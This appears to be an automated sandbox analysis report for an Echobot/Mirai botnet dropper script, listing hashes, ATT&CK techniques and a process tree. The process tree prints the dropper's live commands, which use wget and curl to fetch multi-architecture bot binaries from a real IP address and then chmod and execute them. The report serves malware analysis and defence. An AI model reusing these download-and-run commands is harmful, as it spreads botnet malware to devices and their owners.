echobot | 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd

Analysis

max time kernel
123s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22-11-2024 18:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

513641f5f60d55559c2060489de6d605
SHA1

c95feec2255732b60d434b0639b88a5cff205ea0
SHA256

1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
SHA512

71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 3 IoCs

Processes:

resource	yara_rule
behavioral4/files/fstream-1.dat	family_echobot
behavioral4/files/fstream-4.dat	family_echobot
behavioral4/files/fstream-5.dat	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (120441) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	Process
797	chmod
873	chmod
940	chmod
738	chmod
767	chmod
841	chmod
887	chmod
901	chmod
916	chmod
745	chmod

Executes dropped EXE 10 IoCs

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA

ioc	pid	Process
/tmp/3AvA	739	3AvA
/tmp/3AvA	746	3AvA
/tmp/3AvA	768	3AvA
/tmp/3AvA	798	3AvA
/tmp/3AvA	842	3AvA
/tmp/3AvA	874	3AvA
/tmp/3AvA	888	3AvA
/tmp/3AvA	902	3AvA
/tmp/3AvA	917	3AvA
/tmp/3AvA	941	3AvA

Modifies Watchdog functionality 1 TTPs 14 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA

description	ioc	Process
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA

Enumerates active TCP sockets 1 TTPs 8 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Changes its process name 7 IoCs

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	2hc3fco3nic02af1pf5	768	3AvA
Changes the process name, possibly in an attempt to hide itself	a53ani4n13ck0m1i4e	798	3AvA
Changes the process name, possibly in an attempt to hide itself	kndbf0jcoic	842	3AvA
Changes the process name, possibly in an attempt to hide itself	o41ffd54idok0	874	3AvA
Changes the process name, possibly in an attempt to hide itself	a5103o4mp15dmfh5id	888	3AvA
Changes the process name, possibly in an attempt to hide itself	nn214bdinpamhhd	902	3AvA
Changes the process name, possibly in an attempt to hide itself	chkhbao3505m54h3nc	917	3AvA

Reads system network configuration 1 TTPs 8 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

3AvA3AvAcurl3AvA3AvAcurl3AvA3AvA3AvA3AvAcurlcurlcurl

description	ioc	Process
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/875/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/327/fd	3AvA
File opened for reading	/proc/919/fd	3AvA
File opened for reading	/proc/714/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/708/fd	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/241/fd	3AvA
File opened for reading	/proc/714/fd	3AvA
File opened for reading	/proc/670/exe	3AvA
File opened for reading	/proc/327/fd	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/708/fd	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/923{1,1T	3AvA
File opened for reading	/proc/327/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/327/fd	3AvA
File opened for reading	/proc/172/fd	3AvA
File opened for reading	/proc/714/fd	3AvA
File opened for reading	/proc/420/fd	3AvA
File opened for reading	/proc/359/fd	3AvA
File opened for reading	/proc/686/fd	3AvA
File opened for reading	/proc/172/fd	3AvA
File opened for reading	/proc/329/fd	3AvA
File opened for reading	/proc/330/fd	3AvA
File opened for reading	/proc/330/fd	3AvA
File opened for reading	/proc/330/fd	3AvA
File opened for reading	/proc/679/exe	3AvA
File opened for reading	/proc/329/fd	3AvA
File opened for reading	/proc/903/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/380/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/172/fd	3AvA
File opened for reading	/proc/420/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/329/fd	3AvA
File opened for reading	/proc/686/fd	3AvA
File opened for reading	/proc/379/fd	3AvA
File opened for reading	/proc/330/fd	3AvA
File opened for reading	/proc/420/fd	3AvA
File opened for reading	/proc/686/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/917/fd	3AvA
File opened for reading	/proc/706/exe	3AvA
File opened for reading	/proc/705/exe	3AvA
File opened for reading	/proc/331/fd	3AvA
File opened for reading	/proc/385/fd	3AvA
File opened for reading	/proc/679/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/679/fd	3AvA
File opened for reading	/proc/708/fd	3AvA
File opened for reading	/proc/172/fd	3AvA
File opened for reading	/proc/861/fd	3AvA
File opened for reading	/proc/889/exe	3AvA
File opened for reading	/proc/331/fd	3AvA
File opened for reading	/proc/329/fd	3AvA
File opened for reading	/proc/172/fd	3AvA
File opened for reading	/proc/686/fd	3AvA
File opened for reading	/proc/147/fd	3AvA
File opened for reading	/proc/385/fd	3AvA

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetcurlcat3AvA

pid	Process
741	wget
743	curl
744	cat
746	3AvA

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlwgetcurlwgetcurlwgetcurlcurl8UsA.shcurlwgetcurlwgetwgetcurlcurlwgetwgetcurlwget

description	ioc	Process
File opened for modification	/tmp/UnHAnaAW.arm7	curl
File opened for modification	/tmp/UnHAnaAW.m68k	wget
File opened for modification	/tmp/UnHAnaAW.sh4	curl
File opened for modification	/tmp/UnHAnaAW.mpsl	wget
File opened for modification	/tmp/UnHAnaAW.arm6	curl
File opened for modification	/tmp/UnHAnaAW.arm7	wget
File opened for modification	/tmp/UnHAnaAW.ppc	curl
File opened for modification	/tmp/UnHAnaAW.m68k	curl
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/UnHAnaAW.mpsl	curl
File opened for modification	/tmp/UnHAnaAW.arm5	wget
File opened for modification	/tmp/UnHAnaAW.arm5	curl
File opened for modification	/tmp/UnHAnaAW.sh4	wget
File opened for modification	/tmp/UnHAnaAW.x86	wget
File opened for modification	/tmp/UnHAnaAW.arm4	curl
File opened for modification	/tmp/UnHAnaAW.mips	curl
File opened for modification	/tmp/UnHAnaAW.arm6	wget
File opened for modification	/tmp/UnHAnaAW.ppc	wget
File opened for modification	/tmp/UnHAnaAW.x86	curl
File opened for modification	/tmp/UnHAnaAW.mips	wget

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:708
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:712
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:730
- /bin/cat
  cat UnHAnaAW.x86
  2⤵
  PID:737
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:739
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:743
- /bin/cat
  cat UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  PID:744
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.mips UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:746
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Writes file to tmp directory
  PID:748
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/cat
  cat UnHAnaAW.mpsl
  2⤵
  PID:765
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:768
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  PID:773
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:785
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:798
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:822
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:824
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:842
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:864
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:871
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:874
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm7
  2⤵
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
  2⤵
  - Writes file to tmp directory
  PID:885
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:888
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.ppc
  2⤵
  - Writes file to tmp directory
  PID:892
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/3AvA
  ./3AvA ppc
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:902
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.m68k
  2⤵
  - Writes file to tmp directory
  PID:912
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/3AvA
  ./3AvA m68k
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:917
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.sh4
  2⤵
  - Writes file to tmp directory
  PID:931
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:938
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.sh4 UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/3AvA
  ./3AvA sh4
  2⤵
  - Executes dropped EXE
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:941

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
98KB

MD5
1bfd79e3eb8d1d5806b78c2ee800ccbe

SHA1
8c7d5fb0ffe8c51e83cfe644a961d3b2bedb5e83

SHA256
186fc8b8165ee76f730ea3b840c59473597282c472529c9b2716baab011787da

SHA512
ade41301de6fdcbd940dd4a2cd7634ffd13dfb4f24c7b2e9b3e25aae7d3a7b1dce4817eada98e628d591cf8fcd1106d5292bee05ba3bcd6b6cc502135409bc0b

Download Submit
/tmp/3AvA

Filesize
102KB

MD5
b76a7dcc2c049315ceac66d7a55408f9

SHA1
2219590bfc9d22674f2fd0d5d61c003b3a838eb9

SHA256
0a64d4e8c432fd6272d4404adef0312a616d20cda9c84fd1ac8f5edc77cb6ff1

SHA512
fe8d4e848a3827e816f9142e1615e4671b2e27ca1b5f6cac03b4d945adf551958e8b49ae1c4387268410aaa2495776b3ce3e3dc2aac2882c35dda3f44358e998

Download Submit
/tmp/UnHAnaAW.x86

Filesize
69KB

MD5
4a5306ed50853b2ce31d13763bde2cd3

SHA1
12a84067a5b8ff314e005365faadd34d47ce0619

SHA256
81d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d

SHA512
b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081

Download Submit